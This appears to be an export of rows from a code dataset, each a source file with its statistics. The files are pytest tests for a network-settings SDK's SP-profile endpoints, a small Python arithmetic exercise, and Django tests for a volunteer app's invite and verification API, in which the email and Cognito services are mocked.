        settings={'qos': [qos_entry]},
    )
@pytest.mark.network_settings
def test_update_sp_profile(api, validator):
    """Update an SP profile and validate the response schema."""
    try:
        assert is_valid_update_sp_profile(
            validator,
            update_sp_profile(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest)):
            print(original_e)
            raise original_e
def update_sp_profile_default(api):
    """Default-parameter variant: update an SP profile with settings=None."""
    request_kwargs = dict(active_validation=True, payload=None, settings=None)
    return api.network_settings.update_sp_profile(**request_kwargs)
@pytest.mark.network_settings
def test_update_sp_profile_default(api, validator):
    """Update an SP profile with default (None) settings and validate the response."""
    try:
        assert is_valid_update_sp_profile(
            validator,
            update_sp_profile_default(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
            raise original_e
def is_valid_delete_sp_profile(json_schema_validate, obj):
    """Validate obj against the delete_sp_profile response schema.

    Returns True when validation passes; the validator raises otherwise.
    """
    schema = json_schema_validate('jsd_cc405e5a256e56788537e12f91de4029_v2_2_2_3')
    schema.validate(obj)
    return True
def delete_sp_profile(api):
    """Delete an SP profile identified by its profile name."""
    return api.network_settings.delete_sp_profile(sp_profile_name='string')
@pytest.mark.network_settings
def test_delete_sp_profile(api, validator):
    """Delete an SP profile and validate the response schema."""
    try:
        assert is_valid_delete_sp_profile(
            validator,
            delete_sp_profile(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest)):
            print(original_e)
            raise original_e
def delete_sp_profile_default(api):
    """Default-parameter variant of delete_sp_profile (same required name argument)."""
    return api.network_settings.delete_sp_profile(sp_profile_name='string')
@pytest.mark.network_settings
def test_delete_sp_profile_default(api, validator):
    """Delete an SP profile (default variant) and validate the response schema."""
    try:
        assert is_valid_delete_sp_profile(
            validator,
            delete_sp_profile_default(api)
        )
    except Exception as original_e:
        with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
            raise original_e
| 31.497126 | 790 | 0.69799 | 3,596 | 32,883 | 6.050334 | 0.076752 | 0.041366 | 0.032357 | 0.03677 | 0.880912 | 0.876316 | 0.85669 | 0.850301 | 0.834306 | 0.799421 | 0 | 0.022814 | 0.214853 | 32,883 | 1,043 | 791 | 31.527325 | 0.819893 | 0.034668 | 0 | 0.648715 | 0 | 0 | 0.107796 | 0.029682 | 0 | 0 | 0 | 0 | 0.04896 | 1 | 0.122399 | false | 0.002448 | 0.004896 | 0 | 0.200734 | 0.02448 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4de31d01bac544683a419465b82a5c4b6e4cbd11 | 34 | py | Python | chapter-02/exercise005.py | krastin/pp-cs3.0 | 502be9aac2d84215db176864e443c219e5e26591 | [
"MIT"
] | null | null | null | chapter-02/exercise005.py | krastin/pp-cs3.0 | 502be9aac2d84215db176864e443c219e5e26591 | [
"MIT"
] | null | null | null | chapter-02/exercise005.py | krastin/pp-cs3.0 | 502be9aac2d84215db176864e443c219e5e26591 | [
"MIT"
] | null | null | null | x = 10.5
# `x` is initialized to 10.5 on the preceding line of this exercise script.
y = 4
# Augmented assignment: x becomes 14.5 (int is promoted to float).
x += y
print(x, y)  # prints: 14.5 4
| 6.8 | 11 | 0.441176 | 10 | 34 | 1.5 | 0.6 | 0.266667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 0.323529 | 34 | 4 | 12 | 8.5 | 0.478261 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.25 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4de3c09e0c747e46527314279fb00f998db33da5 | 10,741 | py | Python | supportal/tests/app/views/test_invite_views.py | Elizabeth-Warren/supportal-backend | e55b0e8fd154730bab1708f27386b2adcb18cfbc | [
"MIT"
] | 34 | 2020-03-27T14:59:04.000Z | 2021-11-15T10:24:12.000Z | supportal/tests/app/views/test_invite_views.py | Elizabeth-Warren/supportal-backend | e55b0e8fd154730bab1708f27386b2adcb18cfbc | [
"MIT"
] | 5 | 2021-03-18T22:51:05.000Z | 2022-02-10T15:03:33.000Z | supportal/tests/app/views/test_invite_views.py | Elizabeth-Warren/supportal-backend | e55b0e8fd154730bab1708f27386b2adcb18cfbc | [
"MIT"
] | 14 | 2020-03-27T17:36:39.000Z | 2020-06-18T21:47:43.000Z | import json
import unittest
import pytest
from django.conf import settings
from model_bakery import baker
from rest_framework import status
from supportal.app.common.enums import CanvassResult
from supportal.app.models import EmailSend, User, VolProspectAssignment
from supportal.app.models.user import UserManager
from supportal.tests import utils
@pytest.mark.django_db
def test_fails_with_no_input(api_client, supportal_admin_user):
auth = utils.id_auth(supportal_admin_user)
res = api_client.post(
f"/v1/invites/", data=json.dumps({}), content_type="application/json", **auth
)
assert res.status_code == status.HTTP_400_BAD_REQUEST
@pytest.mark.django_db
def test_fails_with_invalid_email(api_client, supportal_admin_user):
auth = utils.id_auth(supportal_admin_user)
res = api_client.post(
f"/v1/invites/",
data=json.dumps({"email": "iamnotanemail"}),
content_type="application/json",
**auth,
)
assert res.status_code == status.HTTP_400_BAD_REQUEST
@pytest.mark.django_db
def test_invite_and_create_user(mocker, api_client, supportal_admin_user):
email_to_send = "sgoldblatt@elizabethwarren.com"
assert User.objects.filter(email=email_to_send).count() == 0
auth = utils.id_auth(supportal_admin_user)
mocker.patch.object(
UserManager, "create_cognito_user", return_value={"User": {"Username": "12345"}}
)
with unittest.mock.patch(
"supportal.app.models.user.get_email_service"
) as email_mock:
res = api_client.post(
f"/v1/invites/",
data=json.dumps({"email": email_to_send}),
content_type="application/json",
**auth,
)
email_mock.return_value.send_email.assert_called_with(
configuration_set_name="organizing_emails",
from_email=settings.FROM_EMAIL,
payload={
"email": "sgoldblatt@elizabethwarren.com",
"switchboard_signup_url": settings.SUPPORTAL_BASE_URL,
"transactional": True,
},
recipient="sgoldblatt@elizabethwarren.com",
reply_to_email=settings.REPLY_TO_EMAIL,
template_name="switchboard_invite_email",
application_name="supportal",
)
assert res.status_code == status.HTTP_201_CREATED
users = User.objects.filter(email=email_to_send)
assert users.count() == 1
user = users.first()
assert user.added_by == supportal_admin_user
assert user.verified_at
UserManager.create_cognito_user.assert_called_with(email_to_send)
@pytest.mark.django_db
@unittest.mock.patch("supportal.app.views.invite_views.get_email_service")
def test_invite_user_already_created(
mock, api_client, cambridge_leader_user, hayes_valley_leader_user
):
cambridge_leader_user.added_by = hayes_valley_leader_user
cambridge_leader_user.save()
assert not hayes_valley_leader_user.is_admin
assert not hayes_valley_leader_user.is_staff
assert not hayes_valley_leader_user.is_superuser
for i in range(0, 10):
vpa = baker.make("VolProspectAssignment", user=cambridge_leader_user)
vpa.create_contact_event(
result=CanvassResult.UNREACHABLE_MOVED, metadata={"moved_to": "CA"}
)
hvpa = baker.make("VolProspectAssignment", user=hayes_valley_leader_user)
hvpa.create_contact_event(
result=CanvassResult.UNREACHABLE_MOVED, metadata={"moved_to": "CA"}
)
email_to_send = cambridge_leader_user.email
auth = utils.id_auth(hayes_valley_leader_user)
res = api_client.post(
f"/v1/invites/",
data=json.dumps({"email": email_to_send}),
content_type="application/json",
**auth,
)
assert res.status_code == status.HTTP_204_NO_CONTENT
assert User.objects.filter(email=email_to_send).count() == 1
@pytest.mark.django_db
@unittest.mock.patch("supportal.app.views.invite_views.get_email_service")
def test_invite_available(
mock, api_client, cambridge_leader_user, hayes_valley_leader_user
):
cambridge_leader_user.added_by = hayes_valley_leader_user
cambridge_leader_user.save()
assert not hayes_valley_leader_user.is_admin
assert not hayes_valley_leader_user.is_staff
assert not hayes_valley_leader_user.is_superuser
email_to_send = cambridge_leader_user.email
auth = utils.id_auth(hayes_valley_leader_user)
res = api_client.get(f"/v1/invites/available/", **auth)
assert res.status_code == status.HTTP_200_OK
assert res.data["has_invite"] is False
assert res.data["remaining_contacts_count"] == 10
assert res.data["latest_invite"]["email"] == cambridge_leader_user.email
assert res.data["latest_invite"]["remaining_contacts_count"] == 10
for i in range(0, 15):
vpa = baker.make("VolProspectAssignment", user=cambridge_leader_user)
vpa.create_contact_event(
result=CanvassResult.UNREACHABLE_MOVED, metadata={"moved_to": "CA"}
)
hvpa = baker.make("VolProspectAssignment", user=hayes_valley_leader_user)
hvpa.create_contact_event(
result=CanvassResult.UNREACHABLE_MOVED, metadata={"moved_to": "CA"}
)
res = api_client.get(f"/v1/invites/available/", **auth)
assert res.status_code == status.HTTP_200_OK
assert res.data["has_invite"]
assert res.data["remaining_contacts_count"] == 0
assert res.data["latest_invite"]["email"] == cambridge_leader_user.email
assert res.data["latest_invite"]["remaining_contacts_count"] == 0
@pytest.mark.django_db
@unittest.mock.patch("supportal.app.views.invite_views.get_email_service")
def test_invite_cant_send(
    mock, api_client, cambridge_leader_user, hayes_valley_leader_user
):
    """A non-admin leader with no contact activity cannot send an invite (403)."""
    assert not hayes_valley_leader_user.is_admin
    assert not hayes_valley_leader_user.is_staff
    assert not hayes_valley_leader_user.is_superuser
    email_to_send = cambridge_leader_user.email
    auth = utils.id_auth(hayes_valley_leader_user)
    cambridge_leader_user.added_by = hayes_valley_leader_user
    cambridge_leader_user.save()
    res = api_client.post(
        f"/v1/invites/",
        data=json.dumps({"email": email_to_send}),
        content_type="application/json",
        **auth,
    )
    assert res.status_code == status.HTTP_403_FORBIDDEN
@pytest.mark.django_db
def test_bulk_verify_view(
    api_client, supportal_admin_user, hayes_valley_leader_user, cambridge_leader_user
):
    """An admin can verify multiple users at once via POST /v1/verify."""
    hayes_valley_leader_user.verified_at = None
    cambridge_leader_user.verified_at = None
    hayes_valley_leader_user.save()
    cambridge_leader_user.save()
    auth = utils.id_auth(supportal_admin_user)
    # Patch the email service so no real mail is sent; the mock object itself
    # is not inspected, so no `as` binding is needed.
    with unittest.mock.patch(
        "supportal.app.views.invite_views.get_email_service"
    ):
        res = api_client.post(
            f"/v1/verify",
            data=json.dumps(
                {
                    "emails": [
                        hayes_valley_leader_user.email,
                        cambridge_leader_user.email,
                    ]
                }
            ),
            content_type="application/json",
            **auth,
        )
        assert res.status_code == status.HTTP_200_OK
        hayes_valley_leader_user.refresh_from_db()
        cambridge_leader_user.refresh_from_db()
        assert hayes_valley_leader_user.verified_at is not None
        assert cambridge_leader_user.verified_at is not None
@pytest.mark.django_db
def test_verify_view(api_client, supportal_admin_user, hayes_valley_leader_user):
    """Verifying a user sends one verified-email and clears their demo assignments."""
    hayes_valley_leader_user.verified_at = None
    hayes_valley_leader_user.save()
    VolProspectAssignment.objects.assign(hayes_valley_leader_user)
    email_to_verify = hayes_valley_leader_user.email
    assert hayes_valley_leader_user.verified_at is None
    # An unverified user starts with 10 demo assignments and no real ones.
    assert (
        hayes_valley_leader_user.vol_prospect_assignments.get_demo_queryset().count()
        == 10
    )
    assert (
        hayes_valley_leader_user.vol_prospect_assignments.filter(
            person__is_demo=False
        ).count()
        == 0
    )
    auth = utils.id_auth(supportal_admin_user)
    with unittest.mock.patch(
        "supportal.app.views.invite_views.get_email_service"
    ) as email_mock:
        res = api_client.post(
            f"/v1/verify",
            data=json.dumps({"email": email_to_verify}),
            content_type="application/json",
            **auth,
        )
        # call again because all these methods call twice
        # (verifies the email send is idempotent -- see assert_called_once_with below)
        api_client.post(
            f"/v1/verify",
            data=json.dumps({"email": email_to_verify}),
            content_type="application/json",
            **auth,
        )
        assert res.status_code == status.HTTP_200_OK
        # Despite two POSTs, exactly one verified-email must be sent.
        email_mock.return_value.send_email.assert_called_once_with(
            configuration_set_name="organizing_emails",
            from_email=settings.FROM_EMAIL,
            payload={"email": email_to_verify, "transactional": True},
            recipient=email_to_verify,
            reply_to_email=settings.REPLY_TO_EMAIL,
            template_name=EmailSend.VERIFIED_EMAIL,
            application_name="supportal",
        )
    hayes_valley_leader_user.refresh_from_db()
    assert hayes_valley_leader_user.verified_at is not None
    # Verification removes the demo assignments.
    assert (
        hayes_valley_leader_user.vol_prospect_assignments.get_demo_queryset().count()
        == 0
    )
@pytest.mark.django_db
def test_verify_view_non_admin(api_client, hayes_valley_leader_user):
    """A non-admin cannot verify users (403) and stays unverified."""
    hayes_valley_leader_user.verified_at = None
    hayes_valley_leader_user.save()
    email_to_verify = hayes_valley_leader_user.email
    assert hayes_valley_leader_user.verified_at is None
    auth = utils.id_auth(hayes_valley_leader_user)
    res = api_client.post(
        f"/v1/verify",
        data=json.dumps({"email": email_to_verify}),
        content_type="application/json",
        **auth,
    )
    assert res.status_code == status.HTTP_403_FORBIDDEN
    hayes_valley_leader_user.refresh_from_db()
    assert hayes_valley_leader_user.verified_at is None
@pytest.mark.django_db
def test_verify_view_user_created(mocker, api_client, supportal_admin_user):
    """Verifying an unknown email creates the user (via Cognito) already verified."""
    email = "sgoldblatt-test@elizabethwarren.com"
    auth = utils.id_auth(supportal_admin_user)
    # Stub out the Cognito call so no AWS request is made.
    mocker.patch.object(
        UserManager, "create_cognito_user", return_value={"User": {"Username": "12345"}}
    )
    with unittest.mock.patch("supportal.app.views.invite_views.get_email_service"):
        res = api_client.post(
            f"/v1/verify",
            data=json.dumps({"email": email}),
            content_type="application/json",
            **auth,
        )
        assert res.status_code == status.HTTP_200_OK
        created_user = User.objects.get(email=email)
        assert created_user.verified_at is not None
| 34.986971 | 88 | 0.703473 | 1,375 | 10,741 | 5.12 | 0.121455 | 0.09517 | 0.108665 | 0.134233 | 0.838494 | 0.823153 | 0.801989 | 0.778125 | 0.747159 | 0.705114 | 0 | 0.008626 | 0.201285 | 10,741 | 306 | 89 | 35.101307 | 0.811983 | 0.004376 | 0 | 0.618677 | 0 | 0 | 0.126169 | 0.069024 | 0 | 0 | 0 | 0 | 0.178988 | 1 | 0.038911 | false | 0 | 0.038911 | 0 | 0.077821 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.